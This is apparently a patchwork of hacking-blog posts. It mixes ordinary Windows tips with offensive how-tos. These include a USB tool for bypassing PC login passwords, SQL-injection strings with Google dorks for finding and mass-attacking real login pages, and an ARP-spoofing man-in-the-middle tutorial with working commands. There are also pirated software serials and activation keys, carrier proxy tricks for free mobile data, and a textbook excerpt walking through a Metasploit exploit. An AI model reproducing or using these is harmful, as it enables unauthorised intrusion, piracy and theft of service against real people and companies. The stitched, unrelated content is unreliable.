Hack all the PC/Laptop (100 % Working)

Hack all the PC/Laptop (100 % Working)

blog-windows.blogspot.com
Now I’m Going to share the Greatest trick for the windows…

I’ve Worked at least 1 month to know this trick.. Now U’ll be Lucky..

With this trick U can easily Hack all the PC/laptop when it is password protected.…

Requirements:
Pendrive, KONUSB software

Step 1:
Download KONUSB software from the attachment here

Step 2:
Plug in Pen drive into the PC/laptop and double click on KONBOOTINSTALL.exe & enter the drive letter of the USB
That’s it…

Step 3:
Now insert the pen drive into the PC/Laptop whichever u want to hack, and boot via USB (using Pendrive) …
That’s it.. Next press OK for everything … if it asks for password, leave blank and press OK

NOTE:
This KONUSB software won’t change the Password of the PC/Laptop whatever U hacked.. It just bypass the password restriction.. If u remove the Pendrive, and boot normally it’ll remains the same as it is password protected.

It works in All Operating systems including windows XP, Vista, Windows 7 etc.,
100 % Working.
 

Nero Burning ROM 10.5.10300 Serials only

Nero Burning ROM 10.5.10300 Serials only

blog-windows.blogspot.com

1. Disconnect internet during installation, and/or make sure to BLOCK the
program
from accessing internet (block unwanted traffic by using e.g. a firewall).

2. Register with serial: 9X0C-004C-AXCP-797C-7ET6-C723-1ALK-2UTP
1HY1-014C-AVCP-WE3C-8YV3-C721-1DFK-8219
9X03-016C-MXEX-4536-T0L7-2W2T-AMPX-97TA
9X03-014M-337H-H1CZ-L2KK-229X-1ZUX-LPHA
L2KK-229X-1ZUX-LPHA 9X03-014M-337H-H1CZ

3. Installing the Nero Update feature might as well be disabled
by choosing Custom Installation (to avoid updating).

4. After installation, when at the 'Register at Nero' window,
uncheck all boxes and close the window.

Penetration Testing

Penetration Testing

Penetration Testing
and Tools

Chapter 4 Using Metasploit


CHAPTER 4 Using Metasploit

This chapter will show you how to use Metasploit, an exploit launching and development
platform.
• Metasploit: the big picture
• Getting Metasploit
• Using the Metasploit console to launch exploits
• Using Metasploit to exploit client-side vulnerabilities
• Using the Metasploit Meterpreter
• Using Metasploit as a man-in-the-middle password stealer
• Using Metasploit to auto-attack
• Inside Metasploit exploit modules

Metasploit: The Big Picture
Metasploit is a free, downloadable tool that makes it very easy to acquire, develop, and
launch exploits for computer software vulnerabilities. It ships with professional-grade
exploits for hundreds of known software vulnerabilities. When H.D. Moore released
Metasploit in 2003, it permanently changed the computer security scene. Suddenly, anyone
could become a hacker and everyone had access to exploits for unpatched and
recently patched vulnerabilities. Software vendors could no longer drag their feet fixing
publicly disclosed vulnerabilities, because the Metasploit crew was hard at work developing
exploits that would be released for all Metasploit users.
Metasploit was originally designed as an exploit development platform, and we’ll use
it later in the book to show you how to develop exploits. However, it is probably more
often used today by security professionals and hobbyists as a “point, click, root” environment
to launch exploits included with the framework.
We’ll spend the majority of this chapter showing Metasploit examples. To save space,
we’ll strategically snip out nonessential text, so the output you see while following along
might not be identical to what you see in this book. Most of the chapter examples will be
from Metasploit running on the Windows platform inside the Cygwin environment.
Getting Metasploit
Metasploit runs natively on Linux, BSD, Mac OS X, and Windows inside Cygwin. You
can enlist in the development source tree to get the very latest copy of the framework, or

Gray Hat Hacking: The Ethical Hacker’s Handbook

just use the packaged installers from http://framework.metasploit.com/msf/download.
The Windows console application (msfconsole) that we will be using throughout this
chapter requires the Cygwin environment to run. The Windows package comes with an
AJAX browser-based interface (msfweb) which is okay for light usage, but you’ll eventually
want to install Cygwin to use the console in Windows. The Cygwin downloader is
www.cygwin.com/setup.exe. Be sure to install at least the following, in addition to the
base packages:
• Devel readline, ruby, and subversion (required for msfupdate)
• Interpreters ruby
• Libs readline
• Net openssl

References
Installing Metasploit on Windows http://metasploit.com/dev/trac/wiki/Metasploit3/
InstallWindows
Installing Metasploit on Mac OS X http://metasploit.com/dev/trac/wiki/Metasploit3/
InstallMacOSX
Installing Metasploit on Gentoo http://metasploit.com/dev/trac/wiki/Metasploit3/
InstallGentoo
Installing Metasploit on Ubuntu http://metasploit.com/dev/trac/wiki/Metasploit3/
InstallUbuntu
Installing Metasploit on Fedora http://metasploit.com/dev/trac/wiki/Metasploit3/
InstallFedora
Using the Metasploit Console to Launch Exploits
Our first demo in the tour of Metasploit will be to exploit an unpatched XP Service Pack
1 machine missing the RRAS security update (MS06-025).We’ll try to get a remote command
shell running on that box using the RRAS exploit built into the Metasploit framework.
Metasploit can pair any Windows exploit with any Windows payload. So we can
choose to use the RRAS vulnerability to open a command shell, create an administrator,


start a remote VNC session, or to do a bunch of other stuff. Let’s get started.
$ ./msfconsole
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ msf v3.0
+ -- --=[ 177 exploits - 104 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 30 aux
msf >

Chapter 4: Using Metasploit


PART II
The interesting commands to start with are
show
info
use
Other commands can be found by typing help. Our first task will be to find the name
of the RRAS exploit so we can use it:

msf > show exploits
Exploits
========
Name Description
---- -----------
...
windows/smb/ms04_011_lsass Microsoft LSASS Service
DsRolerUpgradeDownlevelServer Overflow
windows/smb/ms04_031_netdde Microsoft NetDDE Service
Overflow
windows/smb/ms05_039_pnp Microsoft Plug and Play Service
Overflow
windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN
Registry Overflow
windows/smb/ms06_025_rras Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi Microsoft Server Service
NetpwPathCanonicalize Overflow

There it is! Metasploit calls it windows/smb/ms06_025_rras. We’ll use that exploit
and then go looking for all the options needed to make the exploit work.
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >
Notice that the prompt changes to enter “exploit mode” when you use an exploit
module. Any options or variables you set while configuring this exploit will be retained
so you don’t have to reset the options every time you run it. You can get back to the original
launch state at the main console by issuing the back command.
msf exploit(ms06_025_rras) > back
msf > use windows/smb/ms06_025_rras
msf exploit(ms06_025_rras) >
Different exploits have different options. Let’s see what options need to be set to
make the RRAS exploit work.
msf exploit(ms06_025_rras) > show options


Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE ROUTER yes The pipe name to use (ROUTER, SRVSVC)
Gray Hat Hacking: The Ethical Hacker’s Handbook
78
This exploit requires a target address, the port number SMB (server message block)
uses to listen, and the name of the pipe exposing this functionality.
msf exploit(ms06_025_rras) > set RHOST 192.168.1.220
RHOST => 192.168.1.220
As you can see, the syntax to set an option is
set
Top 20 Hacking Tools

Top 20 Hacking Tools

Top 20 Hacking Tools


These are Top 20 Hacking Tools, the list is exhaustive, this are a few to name.

Nessus

The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.

Ethereal


Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.

Snort

Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

Netcat

Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol

TCPdump

TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.

Hping

Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).

DNSiff

DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

GFI LANguard

GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.

Ettercap

>Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.

Nikto


Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.

John the Ripper

John the Ripper is a fast password cracker, currently available for many flavors of Unix.

OpenSSH

OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

TripWire

Tripwire is a tool that can be used for data and program integrity assurance.

Kismet

Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.

NetFilter

NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.

IP Filter

IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.

pf

OpenBSD Packet Filter

fport

fport identifys all open TCP/IP and UDP ports and maps them to the owning application.

SAINT

SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.

OpenPGP

OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

I still don’t know why people take it for granted to download virus protection software, and they wonder why their computers get hacked into.
SQL INJECTION:- List of all the SQL Injection Strings

SQL INJECTION:- List of all the SQL Injection Strings

List of all the SQL Injection Strings
28 September 2008 328 Comments Posted By Ashik
Share16

One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems .

First SEARCH the following Keywords in Google or any Search Engine:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from…choose one that is Vulnerable

INJECTION STRINGS: How to use it?

This is the easiest part…very simple

On the login page just enter something like

user:admin (you dont even have to put this.)
pass:’ or 1=1–

or

user:’ or 1=1–
admin:’ or 1=1–

Some sites will have just a password so

password:’ or 1=1–

In fact I have compiled a combo list with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.

The one I am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string

combo example:

admin:’ or a=a–
admin:’ or 1=1–

And so on. You don’t have to be admin and still can do anything you want. The most important part is example:’ or 1=1– this is our basic injection string

Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO…G=Google+Search

17,000 possible targets trying various searches spews out plent more

Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on. In a couple of hours you can build up quite a list because I don’t select all results or spider for log in pages. I then save the list fire up Ares and enter

1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start.

Now I dont want to go into problems with users using Ares..thing is i know it works for me…

Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.

There you go you should have access to your vulnerable target by now

Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes

user=’ or 1=1– just as quick as login process

Combo List

There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.

As a result of a lot of requests for the list of SQL Injection String and due to lack of time on our behalf to respond to your Comments we have now decided to give the download link for the list of SQL Injection Strings. Now you just need to Subscribe to our RSS Feed via Email and get the Download link at the bottom of the Confirmation Email. Please don’t Forget to click on the Confirmation Link given in that Email.

6 Tips to Avoid Facebook Viruses and Spam Messages

6 Tips to Avoid Facebook Viruses and Spam Messages Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren’t very difficult to detect if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming process. Its better to avoid spam messages and trojan viruses in the first place. How to avoid it?
1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.

2. Try to avoid Links and videos with Catchy words like “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.

3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.

4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.

5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.

6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.

What’s Next? These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users. If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users in form of comments so that others don’t fall victim of it.

Metasploit Megaprimer


Metasploit Megaprimer English H264 580kbps 1280x720 15fps MP3 94kbps 0।99 GB Genre: Video Training In this video series, Vivek Ramachandran takes you through a megaprimer of the metasploit framework starting from the very basics of metasploit to advanced usage, including creation of Meterpreter scripts and extending the framework। Download From Fileserve:
http://www.fileserve.com/file/6TZzMPD http://www.fileserve.com/file/sFfgYTE http://www.fileserve.com/file/AryqXZf http://www.fileserve.com/file/cyXVvVd http://www.fileserve.com/file/4kSgW3d
Download From Filesonic:
http://www.filesonic.com/file/105648012/metasploit_megaprimer.part1.rar http://www.filesonic.com/file/105647782/metasploit_megaprimer.part2.rar http://www.filesonic.com/file/105648392/metasploit_megaprimer.part3.rar http://www.filesonic.com/file/105647932/metasploit_megaprimer.part4.rar http://www.filesonic.com/file/105641352/metasploit_megaprimer.part5.rar
Free airtel 3G trick check out your own mobile.

Free airtel 3G trick check out your own mobile.

blog-windows.blogspot.com.
I am here for my eager reader so that they can get profit of surfing at 3G speed for free. You need to manually configure your settings to use proxy gateway to access the internet. Check out the settings below:

Proxy – 202.133.60.185 or 122.170.122.190 or 122.170.122.111

Port – 8080

APN – airtelgprs.com

Homepage – www.proxy-service.mobi/

First set up your mobile to access internet using above mentioned settings and then restart your phone. Once the phone starts, open up the browser and surf to the homepage after that your internet surfing gets free. (You may be charged 3o Paise for the first surf). This setting is working on Nokia 5235, Nokia C6 and Android phones like LG optimus one. Please let us know if the settings work for you.

You can star=y tuned to recent Tips and tricks by joining us on Facebook or Twitter. You can also subscribe to feeds to get updated directly into your inbox. Enjoy Free 3g surfing.

How to Disable or Enable Auto run CD in Windows XP?

How to Disable or Enable Auto run CD in Windows XP?

blog-windows.blogspot.com

In windows XP you can enjoy a good feature to run CD or DVD automatically when you loaded it into you CD drives on your computer. This is a defaults feature in windows XP but you can disable and enable it according to your nature of work. In user interface mode there is no option to disable or enable this feature, you must edit the registry of windows and be careful to work registry.

Click Start button then type regedit in Run option then press Enter for next.

Here locate the location to:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom

Here you can disable or enable automatically running your CD. Change the value of Autorun to 0 for disable and change the value to 1 for enable. At the end restart your computer for this change.
How to Close All Windows Programs quickly?

How to Close All Windows Programs quickly?

blog-windows.blogspot.com

A cool tip to minimize and maximize all your active windows programs. You can do all using your mouse, but if you want to do this with keyboard then simply press Windows key+M to minimize all active programs and later maximize it using Windows key+Shift+M.

If you want to minimize the all active windows programs one by one then use the shortcut  by pressing Alt+Space+N keys and sequentially maximize the active windows programs using shortcut  Alt+Space+X keys.
How to change the boot Time in window XP?

How to change the boot Time in window XP?

blog-windows.blogspot.com

You can set the boot time in windows XP as your wish if you are install two operating systems on same computer, for example window 2000 with windows XP or more than two. Yow can do this with editing  Boot.ini file. Here you can also set  the sequence for operating system which operating system boot first.


First Right Click on My Computer option and then select its Properties. In next dialog box open Advanced tab button. Under Startup and Recovery, click on the Settings button. Use the spin box "Time to display list of operating systems" to set the number of seconds you want the system to wait before automatically starting the default operating system. Here you will set time in seconds and its range start from 0 and ends with 999 seconds.

After set the time, then click "OK" option to close the dialog box to save your change. The next time you restart, the new time will take effect
How to block any installed application from lunching on your computer?

How to block any installed application from lunching on your computer?

blog-windows.blogspot.com

Today tip will help you to block any windows built-in applications or other third party programs from being executed on a target computer. If you want to restrict an application from running your family members and co-workers then AppLocker provides a simple solution to do so. However this tip is very useful for you, if you are sharing your computer with others or you do not want that other persons run all installed applications. This trick will work in nearly all of the windows versions like windows 2000, XP, 2003 and 2008.
AppLocker provides us a complete solution to block any programs from being executed on a target computer. You can download this tool for any windows version using AppLocker link. Download it and run the easy setup



After installation, double click on AppLocker icon on your desktop to start the Application Locker software. Now this application will display the list of computer software programs like Microsoft Word, Excel, Internet Explorer and many others.


Here click on any application checkbox and then click on Save button to block any software. For example, if you want to block Internet Explorer then select the checkbox of internet explorer and now after saving the change click on Internet Explorer to start it. Here you will get following message:

Now here you can add other application other than the default lock application list, you can lock other programs by clicking the “Configure” button to open the configuration window. Type the caption you want displayed on the ‘Lock application list’. Then, type the programs executable file name and click the ‘Add’ button to add new applications.

Trick To Make Your Firefox Fast

Trick To Make Your Firefox Fast

blog-windows.blogspot.com

This Firefox tricks will improve the speed & load time of firefox. And you will be able to surf faster.


Type about:config in the address bar, Then look for the following entries, and make the corresponding changes.
network.http.max-connections-per-server =32
network.http.max-persistent-connections-per-proxy =16
network.http.max-connections = 64
network.http.max-persistent-connections-per-server = 10
network.http.pipelining = true
network.http.pipelining.maxrequests = 200
network.http.request.max-start-delay = 0
network.http.proxy.pipelining = true
network.http.proxy.version = 1.0

Lastly right-click anywhere and select New- Integer. Name it nglayout.initialpaint.delay and set its value to 0. This value is the amount of time the browser waits before it acts on information it receives. Enjoy!!
Tired of the boring old “start” button at the bottom left corner of your Windows XP’s monitor

Tired of the boring old “start” button at the bottom left corner of your Windows XP’s monitor

blog-windows.blogspot.com

Haven’t posted many Windows XP tricks recently, so here’s one: How to change the start button on your Windows XP.

Tired of the boring old “start” button at the bottom left corner of your Windows XP’s monitor? Want something new to replace iit? Well here’s how to change it.

With a few modifications in the Windows Registry, you can replace the “start” text with anything you like. Great for achieving a new, custom look for your Windows XP. So let’s get started.

Warning: this tutorial is more for advanced users, and I'm not
responsible if your system gets messed up. Only attempt the following
at your own risk.

Step 1: Modify explorer.exe

If the warning didn’t scare you enough, then the title of this step probably did. Yes, we are going to change Explorer, the backbone of your Windows XP, but don’t worry. Everything should be safe as long as you follow the steps closely.

As explorer is a binary file, we need a special tool to modify it. One of the best ones for this purpose is Resource Hacker. There are of course others that will get the trick done, but we will be using RH this tutorial so I recommend installing it to avoid making mistakes. Install it and let’s continue.

As always before changing anything. you want to back up. So open My Computer and navigate to   and look for explorer. Copy paste it to a safe location on your hard drive.

Now that you’ve backed it up, fire up Resource Hacker and find the same explorer.exe.

When you’ve found and opened explorer in RH, navigate to String Table -> 37 -> 1033. The “start” value is on line 4, after the 578. Change the text “start” to anything you want, making sure you keep the quotes. In this example. I changed the text to xptricks.net.

Press the Compile Script button to make Resource Hacker put together the code. Now click File and Save the script as explorer.exe. into C: \WINDOWS\inf or another C: \WINDOWS subfolder.

Note: make sure you choose Save AS, NOT just save!!

And that’s all for the first step! Now let’s move onto the second one -modifying the registry.
Step 2: changing the registry.

By now, you have a modified explorer sitting in the /inf/ subfolder, so we need to tell Windows to use that one, instead of the original one still resting untouched.

To do this, we need to make just one simple registry modification. To open up the registry, press start (something else soon ;) ) -> run and type regedit.

In the registry editor window that opens, navigate to HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\ Windows NT\ CurrentVersion\ Winlogon and look for the registry entry “shell”. Click it.

Change the explorer.exe to inf/explorer.exe or whereever you saved the modified explorer.

And believe it or not, you’re done! All you have to do now is reboot or log out and bacö in to see the changes. Enjoy your new custom Windows XP start button!

Multiple login in yahoo Without Using any Software

Multiple login in yahoo Without Using any Software

blog-windows.blogspot.com

Multiple login in yahoo Without Using any Software

You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps :

1.   Go to Start ----> Run . Type regedit, then enter .

2.  Navigate to HKEY_CURRENT_USER --------> Software ---> yahoo  --->pager---->Test

3.  On the right page , right-click and choose new Dword value .

4.  Rename it as Plural.

5.  Double click and assign a decimal value of 1.

Its done!!
Now close registry and restart yahoo messenger and try Multiple Login
Make your xp genuine sp2 & sp3

Make your xp genuine sp2 & sp3

blog-windows.blogspot.com

This process is very simple and has worked over thousands of computers around the world. It is a simple key which you should replace over the one you are using right now on our non-genuine XP. To achieve this, you must CAREFULLY follow every single step given below.

Download this Genuine XP validation tool (officially released by microsoft) first. Double click the .exe file and check the status. If it say anything in red color, it means that your XP is unlicensed and is vulnerable to microsoft hacks.

Link for the Validation tool:


CODE

Make your XP genuines.rar



Then follow these insturctions carefully:

this key is for sp2:

THE product ID: V2C47 - MK7JD - 3R89F - D2KXW - VPK3J (You should change your existing product ID to this new one by doing the following)

this key is for sp3:

THE product ID: B77QF - DP27W - 4H68R - 72B48 - 78RPD  (You should change your existing product ID to this new one by doing the following)

To change the product ID:

1.Log in as the local Administrator

2.Click Start --> Run --> and type in regedit

3.Browse to: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\wpaevents

4.In the right pane, right-click OOBETimer, and then click Modify

5.Change at least one digit of this value to deactivate Windows

6.Click OK and close regedit

7.Click Start --> Run and type in: %systemroot%\system32\oobe\msoobe.exe /a

8.Click "Yes, I want to telephone a customer service representative to activate Windows, and then click Next

9.Click Change Product Key (at the bottom)

10.Enter your valid Corporate Product Key

11.Press Update and close the window.

12.If you are returned to the previous window, click Remind me later

13.Restart your computer

Verify the change:

1.After the computer restarts, click Start --> Run

2.Type in: %systemroot%\system32\oobe\msoobe.exe /a

3.Make sure the dialog box says 'your copy of windows is already activated'


Now, run the Validation Tool that you downloaded once again to find out that it shows the word "Genuine" in green color.

Just like this:

b77


AGAIN, if you need some more confirmation, download Windows Media Player 11 and install it in just one-click (which is possible only in Genuine Windows XP).

I've tried this on 3 computers myself and it worked on all the 3.


PS. If you download this and make your XP genuine, please leave a small confirmation comment on this thread so that others will know that this truly works 100%.

How To Increase Your Internet Speed By 20%

How To Increase Your Internet Speed By 20%

blog-windows.blogspot.com

If you use Windows XP Professional ,Windows Vista, Windows 7 then it is possible to squeeze an extra 20% out of your internet connection. By default Windows XP Pro,Vista, 7,  holds back 20% of your Internet speed for various services like windows update and spyware checks.

If you want to tap into this locked speed then make the following changes:

1. Go to Start-> Run-> and type gpedit.msc
2. Expand the Administrative Templates branch
3. Expand the Network tab
4. Highlight QoS Packet Scheduler
5. Click on Limit Reservable Bandwidth and check the enabled box
6. Then Change the Bandwidth limit % to 0 %

Once you have done this click apply and restart your PC. After rebooting you should see a noticeable improvement in your net speed.

HOW TO HACK THE COMPUTERS IN LAN HOME BY ETHICAL HACKER

HOW TO HACK THE COMPUTERS IN LAN HOME BY ETHICAL HACKER

blog-windows.blogspot.com
This is what we want to do: Make the target send all http packet to us instead of the gateway Forward them to the real gateway Modify the replay, with the  pictures upside- down Forward the replay to the target This is how we’re going to do it: 1 . Poison the ARP table of the target 2 . Set up our pc as a gateway router 3 . Send all http requests through a squid proxy 4 . Turn images upside-down with a squid script Ok, sound great, lets get started! 1. Poison the ARP table of the target We want the target to send all packets to us instead of the real gateway. To do this we need to know a little about ip addresses and mac addresses. When we wan to send a packet to 10. 0.0.1 , there is sent out an ARP request on the local lan, saying “Which computer is at 10.0.0.1?”, then 10.0.0.1 answers with an ARP repay “I am at 10.0.0.1 , with mac address 11 :22 :33 :44 :55 :66 ″. Then we send the packet to 11 :22 :33 :44 :55 :66. ARP replays are cached in a local ARP table, so the next time we want to send to 10.0.0.1 , we don’t need to ask who’s got it. We are going to send a  fake  ARP replay to the target ( 10.0.0.88) , saying  we  are at 10.0.0.1. Usually ARP replays are accepted even though no request was sent, so this is actually really easy. How do I do this? We can use  arpoison  to construct a fake packet and send it, but i prefer to use another a bit mor powerful script, called  hunt . You can download the hunt source code  here , and compile like this: tar zxvf hunt-1.5. tgz cd hunt-1.5 make If you’re not comfortable compiling yourself, you can download the one i compiled (i386)  here . Fire up hunt: sudo ./hunt In the menu system go to d) daemons rst/arp/sniff/mac a) arp spoof + arp relayer daemon i/I) insert single/range arp spoof s/k) start/stop relayer daemon (press s) Type in the ip of the real gateway, your mac address (find this by running ifconfig), and the targets ip. Now we have poisoned the ARP table of the target. You can confirm the poisoning by typing “arp -a” on the target, and see that the gateway ip has your mac address. 2. Set up our pc as a gateway router This is easy, just do this commands: sudo iptables -F sudo iptables -F -t nat sudo iptables -t nat -A POSTROUTING -o eth0 - j MASQUERADE echo 1 > /proc/sys/net/ipv4 /ip_forward Where eth0 is your network interface connected to the lan. The changes are reset the next time the network is reloaded. 3. Send all http requests through a squid proxy Install squid and reset it’s config: sudo apt-get squid sudo mv /etc/squid/squid.conf /etc/squid/squid. conf.default Edit /etc/squid/squid.conf with your favorite editor like this: http_port 127.0.0.1 :8080 http_port 10.0.0.2 :8080 visible_hostname gateway.my.flat cache_mgr proxy@foo.com httpd_accel_host virtual httpd_accel_port 80 httpd_accel_with_proxy on httpd_accel_uses_host_header on acl all src 0.0.0.0 /0.0.0.0 http_access allow all redirect_program /var/redirect 4. Turn images upside-down with a squid script We use the redirect program defined in the squid config to flip our images, edit /var/redirect to look like this: #!/usr/bin/perl $|=1 ; $count = 0 ; $pid = $$; while (<>) { chomp $_; if ($_ =~ /(.*\.jpg)/i) { $url = $1 ; system(”/usr/bin/wget”, “-q”, “-O”,”/var/www/ $pid-$count.jpg”, “$url”); system(”/usr/bin/mogrify”, “-flip”,”/var/www/ $pid-$count.jpg”); system(”/bin/chmod”, “777″, “/var/www/$pid- $count.jpg”); print “http://127.0.0.1/$pid-$count.jpg\n”; } elsif ($_ =~ /(.*\.gif)/i) { $url = $1 ; system(”/usr/bin/wget”, “-q”, “-O”,”/var/www/ $pid-$count.gif”, “$url”); system(”/usr/bin/mogrify”, “-flip”,”/var/www/ $pid-$count.gif”); system(”/bin/chmod”, “777″, “/var/www/$pid- $count.gif”); print “http://127.0.0.1/$pid-$count.gif\n”; } else { print “$_\n”;; } $count++; } As you can see from the script, we need to serve the flipped images from a local webserver. Therefore, install apache : sudo apt-get install apache2 sudo chmod -R 777 /var/www At last, reload squid with the new configuration: sudo /etc/init.d/squid restart You can test the squid by configuring your  firefox  to use localhost:8080 as a proxy server. YOU HAVE NOW HACKED THE TARGET COMPUTER!
Airtel Free Browsing & Downloading...

Airtel Free Browsing & Downloading...


Create new settings with following details:
=>Access Point (APN): airtelgprs.com =>Homepage: http://0.facebook.com =>Proxy: 208.109.128.144 =>Port: 80
Leave other fields blank & save the settings.Now go tothe homepage, you will see a proxy page, enter ur site in the box & start the fun! Yes, browse & download for free!You should always use the homepage to browse, otherwise it will cost:-)Sometimes it may charge 30ps for you, but usually not more.
high speed browsing via airtel and idea gprs

high speed browsing via airtel and idea gprs


high speed browsing via airtel and idea gprs
hi do you want to browse in high speed via airtel gprs or idea gprs plans? then follow these steps for high speed browsing and unlimited downloads in airtel and idea gprs mobile
plans. idea and airtel free gprs for all india wid  high-speed browsing: https://concealme.com dont forget "https" note -idea users use apn=mmsc
now enjoy high speed browsing via airtel and idea gprs


airtel gprs hack 2011
apn: airtelgprs.com
proxy ip: 74.3.160.66
port: 80
home page: http://0.facebook.com/cgi-bin/nph-get.cgi




https://webxcope.com  new trick for airtel
https://flyproxy.com
wap.google.com/gwt/n?
Free GPRS » Airtel free gprs tricks in PC

Free GPRS » Airtel free gprs tricks in PC


Its my ancient one ploy for free surfing but now wid resume downloading ON PC

AND MOBILE WITH

default browser and

internet

browser,,,speed is

super quick than any other proxies…its

capable to hold reserve so

its reserve capable proxie

with mind blowing

speed FOR PC and mobile:

just connecct mobile

with pc via pc suite ,

place

apn airtelgprs.com

now open any browser

(i recomdd mozilla firefox or opera for resume downloading) and place address

122.170.122.214.proxytea.appspot.com/

surfing site NAME without

http

for develop:

122.170.122.214.proxytea.appspot.com/www.google.com

122.170.122.214.proxytea.appspot.com/www.Hackerlov.blogspot.com

there are many appspot

proxies effective with

our dis ip use any of the below:

122.170.122.214.bypass-proxy.appspot.com/ur url without http

122.170.122.214.bypass-filter.appspot.com/ur url without http

122.170.122.214.reserve-0035.appspot.com/ur url without http

122.170.122.214.reserve-049.appspot.com/ur url without http

122.170.122.214.reserve-0046.appspot.com/ur url without http

when u wil go to download page or tab just click the left pin and copy the download link and paste it into below site

(but dredge up romove the 122.170.122.214.proxytea.appspot.com/ from download link ) and paste the rest orignal url in the quest box of the below site

122.170.122.214.0000a-quick-proxy.de

